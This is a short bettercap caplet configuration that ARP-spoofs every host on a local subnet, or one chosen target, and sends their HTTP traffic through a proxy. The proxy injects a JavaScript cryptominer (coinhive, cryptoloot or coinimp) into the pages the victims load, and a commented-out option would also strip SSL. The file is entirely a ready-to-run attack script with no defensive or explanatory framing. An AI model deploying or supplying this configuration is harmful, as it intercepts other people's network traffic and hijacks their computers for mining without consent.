# this module lets you inject a javascript crypto miner
#
# targeting the whole subnet by default, to make it selective:
#
#   sudo ./bettercap -caplet crypto-miner.cap -eval "set arp.spoof.targets 192.168.1.64"


# set the name of the Miner: coinhive, cryptoloot or coinimp
set cryptominer.name coinhive

# set the key of the Miner
set cryptominer.key 123456789

# inject js miner
set http.proxy.script crypto-miner.js

# uncomment if you want sslstrip enabled
#set http.proxy.sslstrip true

# redirect http traffic to a proxy
http.proxy on

# wait for everything to start properly
sleep 1

# make sure probing is off as it conflicts with arp spoofing
arp.spoof on
